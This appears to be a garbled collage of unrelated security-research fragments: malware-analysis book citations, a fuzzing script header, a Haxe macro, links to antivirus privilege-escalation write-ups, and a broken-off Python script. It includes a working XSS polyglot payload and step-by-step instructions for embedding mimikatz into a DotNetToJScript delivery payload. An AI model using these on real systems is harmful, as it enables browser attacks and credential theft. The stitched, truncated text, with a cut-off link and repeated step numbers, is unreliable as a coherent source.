- Monappa K.A., "Learning Malware Analysis: Explore the concepts, tools, and techniques to analyze and investigate Windows malware".
- Sikorski M., Honig A., "Practical Malware Analysis: The Hands-On Guide to Dissecting Malicious Software".
- Ferrie P., "The 'Ultimate' Anti-Debugging Reference".
- Hale L.M., Adair S., Hartstein B., Richard M., "Malware Analyst's Cookbook".
- Koret J., Bachaalany E., "The Antivirus Hacker's Handbook".
- [Hanel A., "The Beginner's Guide to IDAPython"](https://leanpub.
```python
from winappdbg import *
import sys
import random
import struct
import subprocess

size = 1000
exe_name = "fuzz_server.exe"
snapshot_hook = 0x1400070C0
restore_hook = 0x140007537
```
Create README.rst with https://gist.github.com/fdiskyou/b61de36f7656ab2eed59f6119fc6a372
Edit setup.py
```python
long_desc = open('README.rst').read()

setup(
    (...)
    long_description=long_desc,
    (...)
```
```haxe
class MathEx {
    /**
     * Divide the first integer expression by the second constant integer value.
     * It only works when the numerator is an unsigned short value (0x0000-0xFFFF).
     *
     * @param numerator Unsigned short numerator value
     * @param denominator Constant denominator value
     * @return
     */
    @:macro static public function fastUintConstDiv16(numerator:Expr, denominator:Int):Expr {
```
```
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
```
- https://seclists.org/fulldisclosure/2019/Aug/1
- https://medium.com/tenable-techblog/comodo-from-sandbox-to-system-cve-2019-3969-b6a34cc85e67
- https://blog.silentsignal.eu/2019/06/24/self-defenseless-exploring-kasperskys-local-attack-surface/
- https://safebreach.com/Post/BitDefender-Antivirus-Free-2020-Privilege-Escalation-to-SYSTEM
- https://safebreach.com/Post/Trend-Micro-Password-Manager-Privilege-Escalation-to-SYSTEM
- https://safebreach.com/Post/Check-Point-Endpoint-Security-Initial-Client-for-Windows-Privilege-Escalation-to-SYSTEM
- http://rce4fun.blogspot.com/2019/08/comodo-antivirus-sandbox-race-condition.html
- https://medium.com/bugbountywriteup/5-000-usd-xss-issue-at-avast-desktop-antivirus-for-windows-yes-desktop-1e99375f0968
- https://posts.specterops.io/cve-2019-12757-local-privilege-escalation-in-symantec-endpoint-protection-1f7fd5c859c6
- https://nafiez.github.io/security/poc/2019/11/22/POC-conference-present.html
It is basically a wrapper around the following projects:

- mimikatz (https://github.com/gentilkiwi/mimikatz)
- mimikatz in .NET by Casey Smith (https://gist.github.com/caseysmithrc/87f6572547f633f13a8482a0c91fb7b7), updated from 2.0.0 to 2.1.1 (https://gist.github.com/pljoel/410eeebcaf118b9ac8b8f2b40fd5e863)
- DotNetToJScript (https://github.com/tyranid/DotNetToJScript)

INSTRUCTIONS:

1. Grab the latest release of mimikatz: https://github.com/gentilkiwi/mimikatz/releases
2. a) Uncomment the building lines from Casey's project in Delivery.Program.Main() (you may want to comment out the Exec() line).
   b) It will produce a file.b64; copy its content and replace the Delivery.Package.file string with it.
1. Download the latest release of mimikatz: https://github.com/gentilkiwi/mimikatz/releases
2. Get the Mimikatz PE Loader from https://gist.github.com/pljoel/42dae5e56a86a43612bea6961cb59d1a
3. Use @pljoel's katz.cs file, uncomment the building lines available in Delivery.Program.Main() and comment out the Exec() line of code.
4. Build it to generate file.b64, copy its content and replace the Package.file string available in the payload.txt file.
6. Make sure the payloadPath var is properly set in "TestAssemblyLoader.cs".
```python
#!/usr/bin/env python
# encoding: utf-8
# Author: Psycho_Coder <https://psychocoder.github.io/>
from re import match
from sys import stdout, hexversion, exit, argv
import traceback

TITLE = """
 _ _ _ _____ _ _ _ __ _
```